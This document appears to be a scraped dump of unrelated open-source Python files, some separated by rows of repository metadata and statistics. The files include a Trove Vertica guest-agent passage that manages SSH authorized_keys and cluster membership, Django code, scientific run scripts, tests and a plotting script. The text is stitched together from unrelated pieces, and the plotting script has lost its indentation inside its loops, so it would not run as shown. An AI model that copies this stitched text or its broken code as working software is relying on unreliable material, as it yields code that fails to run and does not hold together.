            read_key_cmd = ("cat %(file)s" % {'file': public_key_file_name})
            out, err = system.shell_execute(read_key_cmd)
        except exception.ProcessExecutionError:
            LOG.exception("Cannot read public key.")
            raise
        return out.strip()

    def authorize_public_keys(self, user, public_keys):
        """Adds public key to authorized_keys for user."""
        LOG.debug("public keys to be added for user: %s.", user)
        user_home_directory = os.path.expanduser('~' + user)
        authorized_file_name = user_home_directory + '/.ssh/authorized_keys'

        try:
            read_key_cmd = ("cat %(file)s" % {'file': authorized_file_name})
            out, err = system.shell_execute(read_key_cmd)
            public_keys.append(out.strip())
        except exception.ProcessExecutionError:
            LOG.debug("Cannot read authorized_keys.")
        all_keys = '\n'.join(public_keys) + "\n"

        try:
            with tempfile.NamedTemporaryFile("w", delete=False) as tempkeyfile:
                tempkeyfile.write(all_keys)
            copy_key_cmd = (("install -o %(user)s -m 600 %(source)s %(target)s"
                             ) % {'user': user, 'source': tempkeyfile.name,
                                  'target': authorized_file_name})
            system.shell_execute(copy_key_cmd)
            os.remove(tempkeyfile.name)
        except exception.ProcessExecutionError:
            LOG.exception("Cannot install public keys.")
            os.remove(tempkeyfile.name)
            raise
    def _export_conf_to_members(self, members):
        """This method exports conf files to other members."""
        try:
            for member in members:
                COPY_CMD = (system.SEND_CONF_TO_SERVER % (system.VERTICA_CONF,
                                                          member,
                                                          system.VERTICA_CONF))
                system.shell_execute(COPY_CMD)
        except exception.ProcessExecutionError:
            LOG.exception("Cannot export configuration.")
            raise

    def install_cluster(self, members):
        """Installs & configures cluster."""
        cluster_members = ','.join(members)
        LOG.debug("Installing cluster with members: %s.", cluster_members)
        self.install_vertica(cluster_members)
        self._export_conf_to_members(members)
        LOG.debug("Creating database with members: %s.", cluster_members)
        self.create_db(cluster_members)
        LOG.debug("Cluster configured on members: %s.", cluster_members)

    def grow_cluster(self, members):
        """Adds nodes to cluster."""
        cluster_members = ','.join(members)
        LOG.debug("Growing cluster with members: %s.", cluster_members)
        self.update_vertica("--add-hosts", cluster_members)
        self._export_conf_to_members(members)
        LOG.debug("Creating database with members: %s.", cluster_members)
        self.add_db_to_node(cluster_members)
        LOG.debug("Cluster configured on members: %s.", cluster_members)

    def shrink_cluster(self, members):
        """Removes nodes from cluster."""
        cluster_members = ','.join(members)
        LOG.debug("Shrinking cluster with members: %s.", cluster_members)
        self.remove_db_from_node(cluster_members)
        self.update_vertica("--remove-hosts", cluster_members)
    def wait_for_node_status(self, status='UP'):
        """Wait until all nodes have the given status."""
        # select node_state from nodes where node_state <> 'UP'
        def _wait_for_node_status():
            out, err = system.exec_vsql_command(self._get_database_password(),
                                                system.NODE_STATUS % status)
            LOG.debug("Polled vertica node states: %s", out)
            if err:
                LOG.error(err)
                raise RuntimeError(_("Failed to query node status."))
            return "0 rows" in out

        try:
            utils.poll_until(_wait_for_node_status, time_out=600,
                             sleep_time=15)
        except exception.PollTimeOut:
            raise RuntimeError(_("Timed out waiting for cluster to "
                                 "change to status %s") % status)
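`wait_for_node_status` above delegates the retry loop to trove's `utils.poll_until`. The underlying poll-until-predicate pattern can be sketched standalone; `poll_until` and `PollTimeOut` here are simplified stand-ins for illustration, not the trove implementations:

```python
import time


class PollTimeOut(Exception):
    """Raised when the predicate never becomes true within time_out."""


def poll_until(predicate, time_out=600, sleep_time=15):
    # Re-evaluate the predicate until it returns True or the deadline passes.
    deadline = time.monotonic() + time_out
    while True:
        if predicate():
            return
        if time.monotonic() >= deadline:
            raise PollTimeOut()
        time.sleep(sleep_time)


# Example: a predicate that succeeds on the third poll.
attempts = []
poll_until(lambda: len(attempts) >= 2 or attempts.append(None),
           time_out=5, sleep_time=0)
print(len(attempts))  # -> 2
```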

# setup.py | jacobschaer/qt_compat | MIT
from setuptools import setup, find_packages
setup(
    name="QtCompat",
    version="0.1",
    packages=find_packages(),
    scripts=[],

    # Project uses reStructuredText, so ensure that the docutils get
    # installed or upgraded on the target machine
    install_requires=[],
    package_data={
    },

    # metadata for upload to PyPI
    author="Jacob Schaer",
    author_email="",
    description="PyQt4, 5 and Pyside Compatibility Library",
    license="MIT",
    keywords="pyqt4 pyqt5 pyside compatibility",
    url="https://github.com/jacobschaer/qt_compat/",  # project home page, if any
    # could also include long_description, download_url, classifiers, etc.
)

# annotations/filters.py | acdh-oeaw/ner-annotator | MIT
import django_filters
from . models import NerSample


class NerSampleListFilter(django_filters.FilterSet):
    text = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=NerSample._meta.get_field('text').help_text,
        label=NerSample._meta.get_field('text').verbose_name
    )

    class Meta:
        model = NerSample
        fields = ['text', 'id']

# submissions/mirror-reflection/solution.py | Wattyyy/LeetCode | MIT
# https://leetcode.com/problems/mirror-reflection
class Solution:
    def mirrorReflection(self, p, q):
        if q == 0:
            return 0
        i = 0
        val = 0
        while True:
            val += q
            i += 1
            if (i % 2 == 0) and (val % p == 0):
                return 2
            elif (i % 2 == 1) and (val % (2 * p) == 0):
                return 0
            elif (i % 2 == 1) and (val % p == 0):
                return 1
            else:
                continue
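A quick standalone check of the walk above, restated as a free function (not part of the original submission): the ray gains `q` units of height per left/right wall hit until the accumulated height `val` is a multiple of `p`, and the parity of the hit count `i` picks which receptor is met.

```python
def mirror_reflection(p, q):
    # Same walk as Solution.mirrorReflection: accumulate height q per
    # wall hit until it lines up with a receptor at a multiple of p.
    if q == 0:
        return 0
    i = val = 0
    while True:
        val += q
        i += 1
        if i % 2 == 0 and val % p == 0:
            return 2  # top-right receptor
        if i % 2 == 1 and val % (2 * p) == 0:
            return 0  # bottom-left receptor
        if i % 2 == 1 and val % p == 0:
            return 1  # top-left receptor


print(mirror_reflection(2, 1))  # -> 2 (the problem's sample case)
print(mirror_reflection(3, 1))  # -> 1
```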

# run/run_fd_tgv_conv.py | huppd/PINTimpact | MIT
""" running convergence for finite differences and Taylor-Green vortex """
import os
from math import pi
import xml.etree.ElementTree as ET

import platform_paths as pp
import manipulator as ma


# load parameter file
ma.set_ids('../XML/parameterTGVTime.xml')
TREE = ET.parse('../XML/parameterTGVTime.xml')
ROOT = TREE.getroot()

ma.set_parameter(ROOT, 'withoutput', 1)
ma.set_parameter(ROOT, 'initial guess', 'zero')
# ma.set_parameter(ROOT, 'refinement level', 1)

# make executable ready
EXE = 'peri_navier3DTime'
os.chdir(pp.EXE_PATH)
os.system('make ' + EXE + ' -j4')

CASE_PATH = [''] * 4

RUNS = range(1)
RES = [10]
STS = [0.1, 10., 1.]
NFS = [72]

ma.set_parameter(ROOT, 'nx', 65)
ma.set_parameter(ROOT, 'ny', 65)
ma.set_parameter(ROOT, 'nz', 5)

CASE_PATH[0] = pp.DATA_PATH + '/FDTGV_conv2'
pp.mkdir(CASE_PATH, 0)
for re in RES:
    CASE_PATH[1] = '/re_' + str(re)
    pp.mkdir(CASE_PATH, 1)
    for st in STS:
        CASE_PATH[2] = '/a2_' + str(st)
        pp.mkdir(CASE_PATH, 2)
        for nf in NFS:
            CASE_PATH[3] = '/nt_' + str(nf)
            pp.mkdir(CASE_PATH, 3)
            #
            pp.chdir(CASE_PATH, 3)
            #
            ma.set_parameter(ROOT, 'Re', re)
            ma.set_parameter(ROOT, 'alpha2', 2. * pi * st * re)
            ma.set_parameter(ROOT, 'nf', nf)
            ma.set_parameter(ROOT, 'npx', 1)
            ma.set_parameter(ROOT, 'npy', 1)
            ma.set_parameter(ROOT, 'npz', 1)
            ma.set_parameter(ROOT, 'npf', 12)
            TREE.write('parameter3D.xml')
            # nptot = npx[i]*npy[i]*npf[i]
            nptot = 12
            mem = int(max(1024, 60 * 1024 / nptot))
            for run in RUNS:
                print()
                print(CASE_PATH)
                exeString = \
                    pp.exe_pre(nptot, ' -N -R "rusage[mem=' +
                               str(mem) + ']" -W 6:00', run) + \
                    pp.EXE_PATH + '/' + EXE
                print(exeString)
                os.system(exeString)
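`manipulator.set_parameter` is a project-local helper; a plausible minimal equivalent with `xml.etree` is sketched below. The `<Parameter name=... value=...>` layout is an assumption for illustration, not necessarily PINTimpact's actual XML schema:

```python
import xml.etree.ElementTree as ET

# Hypothetical parameter-list layout, loosely Trilinos/Teuchos style.
xml_text = """
<ParameterList>
  <Parameter name="Re" value="1"/>
  <Parameter name="nf" value="8"/>
</ParameterList>
"""


def set_parameter(root, name, value):
    # Find the named <Parameter> node and overwrite its value attribute.
    for node in root.iter('Parameter'):
        if node.get('name') == name:
            node.set('value', str(value))
            return
    raise KeyError(name)


root = ET.fromstring(xml_text)
set_parameter(root, 'Re', 10)
print(root.find("Parameter[@name='Re']").get('value'))  # -> 10
```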

#!/usr/bin/env python3
# test/test_message.py | Smac01/Stego | MIT
import unittest
import sys
sys.path.insert(0, '.')

from random import choice
from PIL import Image

from stego.encoder import embed
from stego.decoder import extract, _decompress, IncorrectPassword
from stego.base import make_array, as_string, extract_metadata

images = ['test/rgba.png', 'test/cmyk.tiff', 'test/greyscale.bmp']
image = choice(images)

message = b'Pixels -> smallest unit(small colored square) that constitutes an images.'
key = b'my_secret_key'


def test_embed(message, password):
    imageobj = Image.open(image)
    embed(imageobj, message, password)


def test_extract(password):
    imageobj = Image.open(image)
    img_data = make_array(imageobj.getdata())
    exif = extract_metadata(img_data)
    content = as_string(img_data[slice(24, exif.size)])
    if password:
        content = _decompress(content, key=password)
    else:
        content = _decompress(content)
    return content


class SampleTestMessage(unittest.TestCase):

    def test_message(self):
        test_embed(message, None)
        content = test_extract(None)
        self.assertEqual(message, content)

    def test_message_with_encryption(self):
        test_embed(message, key)
        content = test_extract(key)
        self.assertEqual(message, content)
        self.assertRaises(IncorrectPassword, test_extract, b'random')


if __name__ == '__main__':
    unittest.main()

# opencadd/tests/structure/test_superposition_mda.py | pipaj97/opencadd | MIT
"""
Tests for opencadd.structure.superposition.engines.mda
"""
import pytest

from opencadd.structure.core import Structure
from opencadd.structure.superposition.engines.mda import MDAnalysisAligner


def test_mda_instantiation():
    aligner = MDAnalysisAligner()


def test_mda_calculation():
    aligner = MDAnalysisAligner()
    structures = [Structure.from_pdbid(pdb_id) for pdb_id in ["4u3y", "4u40"]]
    result = aligner.calculate(structures)

    # Check API compliance
    assert "superposed" in result
    assert "scores" in result
    assert "rmsd" in result["scores"]
    assert "metadata" in result

    # Check RMSD values; compare with == so pytest.approx can actually fail
    # (a bare pytest.approx(...) object is always truthy).
    assert result["scores"]["rmsd"] == pytest.approx(1.989, abs=1e-3)
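A note on the approx pitfall behind the TODO above: `pytest.approx(x, rel)` returns a comparator object, and asserting that object bare is always truthy, so such an assert can never fail; the reliable form compares with `==` (`assert value == pytest.approx(expected)`). A stdlib-only illustration of both behaviours, with made-up values:

```python
import math


class Approx:
    """Minimal stand-in for pytest.approx: equal within a tolerance."""

    def __init__(self, expected, abs_tol=1e-3):
        self.expected = expected
        self.abs_tol = abs_tol

    def __eq__(self, other):
        return math.isclose(other, self.expected, abs_tol=self.abs_tol)


rmsd = 1.9892  # stand-in for result["scores"]["rmsd"]

assert Approx(1.989)          # pitfall: the bare object is truthy, never fails
assert rmsd == Approx(1.989)  # intended check: equality within tolerance
print(rmsd == Approx(1.989))  # -> True
print(2.5 == Approx(1.989))   # -> False
```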

# tests/integration/test_serialise.py | csiro-easi/eo-datasets | Apache-2.0
from pathlib import Path
from typing import Dict

from eodatasets3 import serialise

from .common import assert_same, dump_roundtrip


def test_valid_document_works(tmp_path: Path, example_metadata: Dict):
    generated_doc = dump_roundtrip(example_metadata)

    # Do a serialisation roundtrip and check that it's still identical.
    reserialised_doc = dump_roundtrip(
        serialise.to_doc(serialise.from_doc(generated_doc))
    )
    assert_same(generated_doc, reserialised_doc)

    assert serialise.from_doc(generated_doc) == serialise.from_doc(reserialised_doc)
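`dump_roundtrip` and `assert_same` are helpers from the eodatasets test suite; the serialise-then-parse roundtrip idiom they implement can be shown with plain `json` (a generic sketch, not the eodatasets3 codepath):

```python
import json


def dump_roundtrip(doc):
    # Serialise to text and parse it back; if the result equals the input,
    # the codec is lossless for this document.
    return json.loads(json.dumps(doc))


doc = {"id": "example-dataset", "measurements": {"red": {"path": "band04.tif"}}}
assert dump_roundtrip(doc) == doc
print(dump_roundtrip(doc) == doc)  # -> True
```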

# src/plot/plot-bb/plot_methods.py | bcrafton/speed_read | MIT
import numpy as np
import matplotlib.pyplot as plt

####################


def merge_dicts(list_of_dicts):
    results = {}
    for d in list_of_dicts:
        for key in d.keys():
            if key in results.keys():
                results[key].append(d[key])
            else:
                results[key] = [d[key]]
    return results
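`merge_dicts` collects the per-key values from a list of dicts into lists, preserving order; a quick check of the behaviour (the example data is made up):

```python
def merge_dicts(list_of_dicts):
    # Same logic as above: map each key to the list of its values in order.
    results = {}
    for d in list_of_dicts:
        for key in d.keys():
            if key in results.keys():
                results[key].append(d[key])
            else:
                results[key] = [d[key]]
    return results


print(merge_dicts([{'cycle': 3}, {'cycle': 5, 'stall': 1}]))
# -> {'cycle': [3, 5], 'stall': [1]}
```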
####################
comp_pJ = 22. * 1e-12 / 32. / 16.
num_layers = 6
num_comparator = 8
results = np.load('results.npy', allow_pickle=True).item()
y_mean = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_std = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_mac_per_cycle = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_mac_per_pJ = np.zeros(shape=(2, 2, 2, 2, num_layers))
cycle = np.zeros(shape=(2, 2, 2, 2, num_layers))
nmac = np.zeros(shape=(2, 2, 2, 2, num_layers))
array = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_ron = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_roff = np.zeros(shape=(2, 2, 2, 2, num_layers))
y_adc = np.zeros(shape=(2, 2, 2, 2, num_layers, num_comparator))
y_energy = np.zeros(shape=(2, 2, 2, 2, num_layers))
array_util = np.zeros(shape=(2, 2, 2, 2, num_layers))
for key in sorted(results.keys()):
(skip, cards, alloc, profile) = key
alloc = 1 if alloc == 'block' else 0
layer_results = results[key]
max_cycle = 0
for layer in range(num_layers):
rdict = merge_dicts(layer_results[layer])
############################
y_mean[skip][cards][alloc][profile][layer] = np.mean(rdict['mean'])
y_std[skip][cards][alloc][profile][layer] = np.mean(rdict['std'])
############################
y_ron[skip][cards][alloc][profile][layer] = np.sum(rdict['ron'])
y_roff[skip][cards][alloc][profile][layer] = np.sum(rdict['roff'])
y_adc[skip][cards][alloc][profile][layer] = np.sum(rdict['adc'], axis=0)
y_energy[skip][cards][alloc][profile][layer] += y_ron[skip][cards][alloc][profile][layer] * 2e-16
y_energy[skip][cards][alloc][profile][layer] += y_roff[skip][cards][alloc][profile][layer] * 2e-16
y_energy[skip][cards][alloc][profile][layer] += np.sum(y_adc[skip][cards][alloc][profile][layer] * np.array([1,2,3,4,5,6,7,8]) * comp_pJ)
y_mac_per_cycle[skip][cards][alloc][profile][layer] = np.sum(rdict['nmac']) / np.sum(rdict['cycle'])
y_mac_per_pJ[skip][cards][alloc][profile][layer] = np.sum(rdict['nmac']) / 1e12 / np.sum(y_energy[skip][cards][alloc][profile][layer])
############################
cycle[skip][cards][alloc][profile][layer] = np.mean(rdict['cycle'])
nmac[skip][cards][alloc][profile][layer] = np.mean(rdict['nmac'])
array[skip][cards][alloc][profile][layer] = np.mean(rdict['array'])
############################
max_cycle = max(max_cycle, np.mean(rdict['cycle']))
############################
for layer in range(num_layers):
rdict = merge_dicts(layer_results[layer])
############################
y_cycle = np.mean(rdict['cycle'])
y_stall = np.mean(rdict['stall'])
y_array = np.mean(rdict['array'])
array_util[skip][cards][alloc][profile][layer] = (y_array * y_cycle - y_stall) / (y_array * max_cycle)
############################
####################
layers = np.array(range(1, 6+1))
skip_none = int(np.max(cycle[1, 0, 0, 0]))
skip_layer = int(np.max(cycle[1, 0, 0, 1]))
skip_block = int(np.max(cycle[1, 0, 1, 1]))
cards_none = int(np.max(cycle[1, 1, 0, 0]))
cards_layer = int(np.max(cycle[1, 1, 0, 1]))
cards_block = int(np.max(cycle[1, 1, 1, 1]))
height = [skip_none, skip_layer, skip_block, cards_none, cards_layer, cards_block]
x = ['skip/none', 'skip/layer', 'skip/block', 'cards/none', 'cards/layer', 'cards/block']
####################
plt.rcParams.update({'font.size': 12})
####################
plt.cla()
plt.clf()
plt.close()
plt.ylabel('# Cycles')
# plt.xlabel('Method')
plt.xticks(range(len(x)), x, rotation=45)
width = 0.2
plt.bar(x=x, height=height, width=width)
ax = plt.gca()
for i, h in enumerate(height):
    # print (i, h)
    ax.text(i - width, h + np.min(height)*0.02, str(h), fontdict={'size': 12})
fig = plt.gcf()
fig.set_size_inches(9, 5)
plt.tight_layout()
fig.savefig('cycles.png', dpi=300)
####################
| 29.721088 | 145 | 0.559396 | 656 | 4,369 | 3.591463 | 0.182927 | 0.03056 | 0.03056 | 0.169355 | 0.58871 | 0.570883 | 0.534805 | 0.480475 | 0.325976 | 0.260187 | 0 | 0.034746 | 0.189746 | 4,369 | 146 | 146 | 29.924658 | 0.630791 | 0.007553 | 0 | 0.051282 | 0 | 0 | 0.042893 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.025641 | 0 | 0.051282 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8148c634d7eb81e51ee23984bd4ad754b8ff54d8 | 816 | py | Python | models/__init__.py | pgodet/star_flow | cedb96ff339d11abf71d12d09e794593a742ccce | [
"Apache-2.0"
] | 10 | 2020-11-17T12:55:00.000Z | 2022-01-13T07:23:55.000Z | models/__init__.py | pgodet/star_flow | cedb96ff339d11abf71d12d09e794593a742ccce | [
"Apache-2.0"
] | 1 | 2021-01-02T22:46:07.000Z | 2021-01-02T22:46:07.000Z | models/__init__.py | pgodet/star_flow | cedb96ff339d11abf71d12d09e794593a742ccce | [
"Apache-2.0"
] | 1 | 2021-01-26T10:53:02.000Z | 2021-01-26T10:53:02.000Z | from . import pwcnet
from . import pwcnet_irr
from . import pwcnet_occ_joint
from . import pwcnet_irr_occ_joint
from . import tr_flow
from . import tr_features
from . import IRR_PWC
from . import IRR_PWC_occ_joint
from . import STAR
PWCNet = pwcnet.PWCNet
PWCNet_irr = pwcnet_irr.PWCNet
PWCNet_occ_joint = pwcnet_occ_joint.PWCNet
PWCNet_irr_occ_joint = pwcnet_irr_occ_joint.PWCNet
TRFlow = tr_flow.TRFlow
TRFlow_occjoint = tr_flow.TRFlow_occjoint
TRFlow_irr = tr_flow.TRFlow_irr
TRFlow_irr_occjoint = tr_flow.TRFlow_irr_occjoint
TRFeat = tr_features.TRFeat
TRFeat_occjoint = tr_features.TRFeat_occjoint
TRFeat_irr_occjoint = tr_features.TRFeat_irr_occjoint
# -- With refinement ---
IRR_PWC = IRR_PWC.PWCNet
IRR_occ_joint = IRR_PWC_occ_joint.PWCNet
StarFlow = STAR.StarFlow
| 24 | 53 | 0.792892 | 123 | 816 | 4.837398 | 0.138211 | 0.151261 | 0.117647 | 0.114286 | 0.067227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154412 | 816 | 33 | 54 | 24.727273 | 0.862319 | 0.026961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.391304 | 0 | 0.391304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
815535942d00809101f7b9f361c4f256b557f56f | 1,321 | py | Python | examples/generated_sample_regression.py | micheleantonazzi/gibson-dataset | cb5fc81061bbda1a653d6fc7b625b14c8a517f3c | [
"MIT"
] | 3 | 2021-10-31T17:43:50.000Z | 2022-03-21T08:55:01.000Z | examples/generated_sample_regression.py | micheleantonazzi/gibson-dataset | cb5fc81061bbda1a653d6fc7b625b14c8a517f3c | [
"MIT"
] | null | null | null | examples/generated_sample_regression.py | micheleantonazzi/gibson-dataset | cb5fc81061bbda1a653d6fc7b625b14c8a517f3c | [
"MIT"
] | null | null | null | from generic_dataset.data_pipeline import DataPipeline
from generic_dataset.generic_sample import synchronize_on_fields
from generic_dataset.sample_generator import SampleGenerator
import numpy as np
import generic_dataset.utilities.save_load_methods as slm
pipeline_rgb_to_gbr = DataPipeline().add_operation(lambda data, engine: (data[:, :, [2, 1, 0]], engine))
@synchronize_on_fields(field_names={'field_3'}, check_pipeline=False)
def field_3_is_positive(sample) -> bool:
return sample.get_field_3() > 0
# To model a regression problem, label_set parameter must be empty
GeneratedSampleRegression = SampleGenerator(name='GeneratedSampleRegression', label_set=set()).add_dataset_field(field_name='rgb_image', field_type=np.ndarray, save_function=slm.save_compressed_numpy_array, load_function=slm.load_compressed_numpy_array) \
.add_dataset_field(field_name='bgr_image', field_type=np.ndarray, save_function=slm.save_cv2_image_bgr, load_function=slm.load_cv2_image_bgr) \
.add_field(field_name='field_3', field_type=int) \
.add_custom_pipeline(method_name='create_pipeline_convert_rgb_to_bgr', elaborated_field='rgb_image', final_field='bgr_image', pipeline=pipeline_rgb_to_gbr) \
.add_custom_method(method_name='field_3_is_positive', function=field_3_is_positive) \
.generate_sample_class() | 62.904762 | 255 | 0.824375 | 192 | 1,321 | 5.239583 | 0.369792 | 0.035785 | 0.053678 | 0.047714 | 0.131213 | 0.083499 | 0.083499 | 0.083499 | 0.083499 | 0 | 0 | 0.009868 | 0.079485 | 1,321 | 21 | 256 | 62.904762 | 0.817434 | 0.048448 | 0 | 0 | 0 | 0 | 0.101911 | 0.046975 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0.066667 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
816842032e46719c27ed0ea91d613473a3f094ca | 601 | py | Python | architecture_tool_django/graphdefs/urls.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
] | 1 | 2021-08-13T01:37:29.000Z | 2021-08-13T01:37:29.000Z | architecture_tool_django/graphdefs/urls.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
] | null | null | null | architecture_tool_django/graphdefs/urls.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
] | 1 | 2021-07-19T07:57:54.000Z | 2021-07-19T07:57:54.000Z | from django.urls import path
from . import views
app_name = "graphs"
urlpatterns = [
path("graphs/", views.GraphListView.as_view(), name="graph.list"),
path("graphs/create/", views.GraphCreateView.as_view(), name="graph.create"),
path(
"graphs/<str:pk>/",
views.GraphDetailView.as_view(),
name="graph.detail",
),
path(
"graphs/<str:pk>/update/",
views.GraphUpdateView.as_view(),
name="graph.update",
),
path(
"graphs/<str:pk>/delete/",
views.GraphDeleteView.as_view(),
name="graph.delete",
),
]
| 24.04 | 81 | 0.587354 | 66 | 601 | 5.257576 | 0.378788 | 0.144092 | 0.144092 | 0.216138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.236273 | 601 | 24 | 82 | 25.041667 | 0.755991 | 0 | 0 | 0.272727 | 0 | 0 | 0.244592 | 0.076539 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81690ba836e0e2d1c0fdfb89754bbbb996e53c02 | 2,823 | py | Python | lib/utils/blob.py | TheRevanchist/DeepWatershedDetection | 6d8f3b3ca6db67bcebef8e18fb11248e15bd9dc4 | [
"MIT"
] | null | null | null | lib/utils/blob.py | TheRevanchist/DeepWatershedDetection | 6d8f3b3ca6db67bcebef8e18fb11248e15bd9dc4 | [
"MIT"
] | null | null | null | lib/utils/blob.py | TheRevanchist/DeepWatershedDetection | 6d8f3b3ca6db67bcebef8e18fb11248e15bd9dc4 | [
"MIT"
] | null | null | null | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick - extended by Lukas Tuggener
# --------------------------------------------------------
"""Blob helper functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import cv2
import random
def im_list_to_blob(ims):
  """Convert a list of images into a network input.
  Assumes images are already prepared (means subtracted, BGR order, ...).
  """
  max_shape = np.array([im.shape for im in ims]).max(axis=0)
  num_images = len(ims)
  blob = np.zeros((num_images, max_shape[0], max_shape[1], 3),
                  dtype=np.float32)
  for i in range(num_images):
    im = ims[i]
    blob[i, 0:im.shape[0], 0:im.shape[1], :] = im
  return blob
def prep_im_for_blob(im, pixel_means, global_scale, args):
  """Mean subtract and scale an image for use in a blob."""
  im = im.astype(np.float32, copy=False)
  # subtract mean (the flag keeps the original "substract" spelling)
  if args.substract_mean == "True":
    im -= pixel_means
  # do global scaling
  im = cv2.resize(im, None, None, fx=global_scale, fy=global_scale,
                  interpolation=cv2.INTER_LINEAR)
  im_size_max = np.max(im.shape[0:2])
  # Prevent the biggest axis from being more than MAX_SIZE
  if im_size_max > args.max_edge:
    if not args.crop == "True":
      # scale down if bigger than max size
      re_scale = (float(args.max_edge) / float(im_size_max))
      im = cv2.resize(im, None, None, fx=re_scale, fy=re_scale,
                      interpolation=cv2.INTER_LINEAR)
      global_scale = global_scale * re_scale
      crop_box = [0, 0, im.shape[0], im.shape[1]]
    else:
      # Crop image
      topleft = random.uniform(0, 1) < args.crop_top_left_bias
      # crop to max size if necessary
      if im.shape[0] <= args.max_edge or topleft:
        crop_0 = 0
      else:
        crop_0 = random.randint(0, im.shape[0] - args.max_edge)
      if im.shape[1] <= args.max_edge or topleft:
        crop_1 = 0
      else:
        crop_1 = random.randint(0, im.shape[1] - args.max_edge)
      crop_box = [crop_0, crop_1, min(crop_0 + args.max_edge, im.shape[0]), min(crop_1 + args.max_edge, im.shape[1])]
      im = im[crop_box[0]:crop_box[2], crop_box[1]:crop_box[3]]
  else:
    crop_box = [0, 0, im.shape[0], im.shape[1]]
  if not args.pad_to == 0:
    # pad to fit RefineNet  # TODO fix refinenet padding problem
    y_mulity = int(np.ceil(im.shape[0] / float(args.pad_to)))
    x_mulity = int(np.ceil(im.shape[1] / float(args.pad_to)))
    canv = np.ones([y_mulity * args.pad_to, x_mulity * args.pad_to, 3], dtype=np.uint8) * 255
    canv[0:im.shape[0], 0:im.shape[1]] = im
    im = canv
  return im, global_scale, crop_box
| 32.825581 | 111 | 0.631598 | 456 | 2,823 | 3.725877 | 0.307018 | 0.074161 | 0.047087 | 0.026486 | 0.260742 | 0.16598 | 0.080047 | 0.052972 | 0.052972 | 0.029429 | 0 | 0.029897 | 0.206164 | 2,823 | 85 | 112 | 33.211765 | 0.728246 | 0.240879 | 0 | 0.16 | 0 | 0 | 0.003795 | 0 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.04 | false | 0 | 0.12 | 0 | 0.2 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81691bebff51090814a13a3ea3f9262d90d38a7b | 1,022 | py | Python | edlm/convert/_get_media_folders.py | etcher-be/EDLM | 7b25c85252fd15c2c222b00271f7a32e335db704 | [
"MIT"
] | null | null | null | edlm/convert/_get_media_folders.py | etcher-be/EDLM | 7b25c85252fd15c2c222b00271f7a32e335db704 | [
"MIT"
] | 4 | 2020-03-24T16:53:26.000Z | 2020-06-26T08:31:13.000Z | edlm/convert/_get_media_folders.py | etcher-be/EDLM | 7b25c85252fd15c2c222b00271f7a32e335db704 | [
"MIT"
] | null | null | null | # coding=utf-8
"""
Gathers the media folders
"""
import elib
from ._context import Context
def get_media_folders(ctx: Context):
"""
Gathers the media folders
"""
ctx.info('gathering media folders')
media_folders = []
this_folder = ctx.source_folder
while True:
ctx.debug(f'traversing: "{this_folder}"')
media_folder_candidate = elib.path.ensure_path(this_folder, 'media', must_exist=False).absolute()
if media_folder_candidate.exists() and media_folder_candidate.is_dir():
ctx.debug(f'media folder found: "{media_folder_candidate}"')
media_folders.append(media_folder_candidate)
if len(this_folder.parents) is 1:
ctx.debug(f'reach mount point at: "{this_folder}"')
break
this_folder = this_folder.parent
# if not media_folders:
# raise ConvertError('no media folder found', ctx)
ctx.info(f'media folders:\n{elib.pretty_format(media_folders)}')
ctx.media_folders = media_folders
